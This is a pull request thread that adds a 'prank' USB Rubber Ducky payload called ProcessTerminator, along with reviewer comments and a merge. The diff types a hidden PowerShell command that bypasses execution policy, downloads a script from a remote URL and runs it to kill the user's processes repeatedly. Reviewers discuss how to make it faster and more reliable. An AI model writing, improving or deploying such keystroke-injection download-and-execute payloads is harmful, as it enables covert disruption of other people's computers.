### PR TITLE
ProcessTerminator Payload

### PR DESCRIPTION
**Pull request by dsymbol**
Hidden PowerShell script that tirelessly hunts down user processes and terminates them

### CODE REVIEW

**Comment by hak5darren** [comment]
Hey there. I just wanted to say, this is a cool payload — but it's worth noting that the technique you're using here is a bit complex for the objective. Your run dialog line that downloads and runs the powershell is 204 characters... while the powershell itself is just 194 characters. That's all without alias optimization, which I'm sure could be applied. You might consider achieving this result by injecting the powershell code directly. I bet you could reduce the run-time significantly while removing the Internet requirement.

File: payloads/library/prank/ProcessTerminator/payload.txt [hunk 1]
```diff
@@ -0,0 +1,9 @@
+REM Title: ProcessTerminator
+REM Author: dsymbol
+REM Description: Hidden PowerShell script that tirelessly hunts down user processes and terminates them
+REM Target: Windows
+
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -Exec Bypass iwr https://raw.githubusercontent.com/hak5/usbrubberducky-payloads/master/payloads/library/prank/ProcessTerminator/pt.ps1 -OutFile $env:TEMP\pt.ps1; & "$env:TEMP\pt.ps1"
```
Comment (dallaswinger) [inline payloads/library/prank/ProcessTerminator/payload.txt:8]: If you'd like to stage a payload, using the Hak5 payload repo as a CDN for deployment isn't the way to do so. 

If keeping this as staged, please use DEFINE syntax to provide the URL to be configurable by the end payload user. 

Example:
DEFINE PAYLOAD_URL https://example.com

then using PAYLOAD_URL in place of where you currently have the URL

File: payloads/library/prank/ProcessTerminator/payload.txt [hunk 2]
```diff
@@ -0,0 +1,9 @@
+REM Title: ProcessTerminator
+REM Author: dsymbol
+REM Description: Hidden PowerShell script that tirelessly hunts down user processes and terminates them
+REM Target: Windows
+
```
Comment (dallaswinger) [inline payloads/library/prank/ProcessTerminator/payload.txt:5]: having no boot delay and not using the extension DETECT_READY or similar will likely cause this payload to be unreliable on most systems. The Ducky is going to boot and inject GUI r before the system is ready to accept keystrokes

**Comment by dsymbol** [comment]
> Hey there. I just wanted to say, this is a cool payload — but it's worth noting that the technique you're using here is a bit complex for the objective. Your run dialog line that downloads and runs the powershell is 204 characters... while the powershell itself is just 194 characters. That's all without alias optimization, which I'm sure could be applied. You might consider achieving this result by injecting the powershell code directly. I bet you could reduce the run-time significantly while removing the Internet requirement.

I wanted to inject the powershell code directly however for some reason I couldn't get the script working if it wasn't downloaded locally. If you have any idea as to why that is lmk.

**Pull request merged**